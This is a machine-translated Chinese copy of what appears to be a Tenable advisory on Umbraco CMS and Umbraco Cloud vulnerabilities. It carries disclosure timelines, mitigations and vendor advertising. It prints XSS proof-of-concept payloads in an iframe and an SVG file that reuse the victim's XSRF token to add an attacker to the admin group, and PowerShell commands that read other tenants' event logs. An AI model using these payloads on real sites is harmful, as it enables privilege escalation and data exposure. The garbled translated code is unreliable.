脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

Umbraco云CMS多个漏洞

媒介

剧情简介

站得住脚的研究发现多个漏洞Umbraco CMS和Umbraco云CMS平台导致大量的跨站点脚本(XSS)漏洞,和敏感的潜在信息披露内部凭证PII和用户。

Umbraco CMS

身份验证通过iframes XSS存储在富文本编辑器内容- cve - 2020 - 5809

一个存储XSS漏洞存在于Umbraco CMS。经过身份验证的用户可以任意JavaScript代码注入iframes使用TinyMCE富文本编辑器编辑内容时,如TinyMCE默认配置为允许iframes Umbraco CMS。

概念验证
将以下负载在一个良性的/正常内容更新将导致试图升级攻击者的用户id到管理组(由管理员会成功,如果触发)。一旦用户管理员,他们可能安装恶意umbraco包并获得远程代码执行。

< iframe srcdoc = " <脚本> var xhr = new XMLHttpRequest (); xhr。open(“文章”、“umbraco / backoffice / UmbracoApi /用户/ PostSetUserGroupsOnUsers吗?userGroupAliases = writer&userGroupAliases = admin&userIds = < attackerId > ', true); xhr。setRequestHeader (X-UMB-XSRF-TOKEN, document.cookie.match (/ UMB-XSRF-TOKEN = [^;] + / g) [0] .split (“=”) [1]); xhr.send(); > < /脚本”宽度= " 0 "高度= " 0 " > < / iframe >

身份验证通过上传XSS . svg文件存储在媒体- cve - 2020 - 5810

一个存储XSS漏洞存在于Umbraco CMS。经过身份验证的用户授权上传媒体文件可以上传恶意.作为存储XSS负载。

如果攻击者说服另一个用户遵循直接链接到svg文件(http:// < umbracosite > /媒体/ xyz / attack.svg),攻击者将能够执行javascript在受害者的浏览器。

概念验证

以下,保存和上传如svg文件将作为一个存储XSS负载。如果由管理员,将攻击者的用户id添加到管理组。

< svg version = " 1.1 "宽度= =“200”“200”高度xmlns = " http://www.w3.org/2000/svg " > < script type = " text / javascript " > var xhr = new XMLHttpRequest ();xhr。开放(“文章”、“umbraco / backoffice / UmbracoApi /用户/ PostSetUserGroupsOnUsers ? userGroupAliases = writer& userGroupAliases = admin&用户id = < attackerId > ', true);xhr。setRequestHeader (X-UMB-XSRF-TOKEN, document.cookie.match (/ UMB-XSRF-TOKEN = [^;] + / g) [0] .split (“=”) [1]);xhr.send ();svg脚本< / > < / >

路径遍历和任意文件写在包安装cve - 2020 - 5811

经过身份验证的路径遍历Umbraco CMS包安装中存在安全漏洞,导致网站之外的任意文件写入和预期路径在安装一个Umbraco包回家。

在安装包时,文件<文件>的包。xml可以给一个orgPath以外的网站主目录(使用一个相对或绝对路径),允许攻击者工艺恶意包,可以写一个任意文件在任何地方运行web服务器的服务帐户/用户权限。

虽然可以理解它是一个管理的功能,一个包文件以外的地方网站家里会拒绝被卸载,卸载过程检查站点内的文件是家里(与安装过程)。

Umbraco云CMS平台

Umbraco云CMS平台提供用户访问他们Umbraco CMS实例,以及Powershell /控制台访问(通过捻角羚工具)底层Windows Azure托管服务器实例的CMS。

Windows Server实例多租户,这意味着多个用户的个人Umbraco云CMS网站每台服务器托管,各有其独特的网站名称/ id。CMS和捻角羚工具作为低权限运行IIS应用程序池的身份,但是他们仍然有潜在的敏感文件和Windows事件日志包含其他用户的用户名/电子邮件和IP地址。

披露相应的用户名/电子邮件通过Concorde.Messaging.ServiceRelay-Log网站名称/ id

使用powershell scm.s1.umbraco通过捻角羚。io, Umbraco云用户可能会披露其他用户的邮件(和个人网站名称他们属于)通过解析Concorde.Messaging。ServiceRelay-Log事件日志。

用户名是披露的结果的电子邮件被用作文件名backoffice .courier文件。

概念验证

get-eventlog -logname协和*信息“* backoffice \用户*”最新5 |格式表属性信息

示例输出

下面是一个小事件的相关内容包含敏感信息的消息。网站名称和git commit散列值已被移除,和用户名已经改变了我们(电子邮件保护)(_user_tenable.com.courier对应)。

(线程46)- CopyAndCommitHandler:网站<网站名称/ id >,分支“主(参/头/硕士)”——提交
结果:
提交结果:文件致力于“主(参/头/硕士)”在“C: \ DWASFiles \ \ <网站名称/ id > \ VirtualDirectory0网站网站\ \库”,因为成功。
IsCurrentRepositoryHead吗?真(检出主分支?假)
当前版本:<提交>,以前版本:<提交>。
文件:C: \ DWASFiles \ \ <网站名称/ id > VirtualDirectory0 \网站网站\ repository \ \ backoffice \ \ _user_tenable.com.courier用户数据

披露用户IPs(用户名/电子邮件),网站域名和网站名称/ id通过应用程序事件日志

将。net错误个人Umbraco云托管网站登录应用程序事件日志,可以看到用户的IP地址访问网站错误发生时,唯一的站点名称/ id,域名的网站托管。

此外,如果用户经过身份验证的用户/管理员,它将显示他们的用户名/电子邮件。

概念验证

get-eventlog -logname应用程序消息请求URL“* *”最新5 |格式表属性信息

或者,如果专门寻找任何经过身份验证的用户名/ IPs:

get-eventlog -logname应用程序消息“*验证:真*”最新5 |格式表属性信息

示例输出

下面是一个小事件消息的相关部分,网站域名和网站名称/ id删除,和用户名/电子邮件改变了。

请求信息:
请求URL: https:// < domain_name.tld >: 443 / umbraco / backoffice UmbracoApi /宏/ GetMacroResultAsHtmlForEditor
请求路径:
/ umbraco / backoffice / UmbracoApi /宏/ GetMacroResultAsHtmlForEditor
用户主机地址:< IP地址>
用户:(电子邮件保护)
身份验证:真
认证类型:UmbracoBackOffice
线程帐户名称:IIS
APPPOOL \ <网站名称/ id >

信息披露的内部Umbraco ElasticSearch凭证

由于他们的网站以外的用户能够访问文件房屋/本地目录,用户下载Concorde.Messaging.ServiceRelay是可能的。exe从C: \ \ \ MessagingService \部署部署。这包含静态的凭证Umbraco Elasticsearch实例。

然后您可以使用一个工具dnSpy工具阅读。net代码。

的凭证,以及相应的elasticsearch uri,位于SetupElasticsearchClient方法,在Concorde.Messaging.ServiceRelay下的服务类。

ElasticSearch连接设置

披露内部Umbraco松弛用户令牌

文件C: \ KuduService \ \ logcommits \ LogGitCommits.exe工件。配置包含一个松弛用户名和令牌可以用来访问内部Umbraco松弛。

Umbraco疲软令牌

解决方案

cve - 2020 - 5811:

可以减轻这个问题通过更新Umbraco CMS 9或更高版本,它引入了一个新的管理方式包。

cve - 2020 - 5809和cve - 2020 - 5810:

目前没有发布修复这些漏洞。默认Umbraco实例仍然脆弱。
Umbraco网站的管理员可以减轻cve - 2020 - 5809,通过配置文件cve - 2020 - 5810。

cve - 2020 - 5809:在tinyMceConfig.config除去validElements iframe [*]

cve - 2020 - 5810:添加svg在umbracoSettings.config disallowedUploadFiles的列表

Umbraco云平台问题:

Umbraco更新了敏感文件和事件日志来限制访问权限,从那些仍可访问和删除敏感信息。

披露时间表

9/25/2020——漏洞发现
9/30/2020——站得住脚的发送Umbraco漏洞报告。
10/02/2020 Umbraco承认,表明问题正在接受调查。
10/06/2020——Umbraco通知站得住脚的问题正在被解决。
10/14/2020 Umbraco通知站得住脚的,修复已经推
10/14/2020——站得住脚的笔记的解决方案的一个问题,通知Umbraco。
10/19/2020 Umbraco通知站得住脚的,解决方案也正在解决。
10/20/2020——Umbraco通知站得住脚的解决方案已经解决。
12/30/2020 -咨询与CMS漏洞的披露日期90天更新

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
- 2020 - 59
信贷
埃文·格兰特
CVSSv2基地/时间的分数
4.0
CVSSv2向量
AV: N /交流:L /非盟:S / C: P / I: N: N
CVSSv3基地/时间的分数
6.5
CVSSv3向量
AV: N /交流:L /公关:L / UI: N / S: U / C: H /我:N: N
受影响的产品
Umbraco云CMS平台
Umbraco CMS
风险因素
媒介

咨询时间

10/21/2020——咨询发布。
12/30/2020——咨询更新。
1/08/2021——指出移植cve - 2020 - 5809 / cve - 2020 - 5810
05/10/2023 -指出缓解cve - 2020 - 5811

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map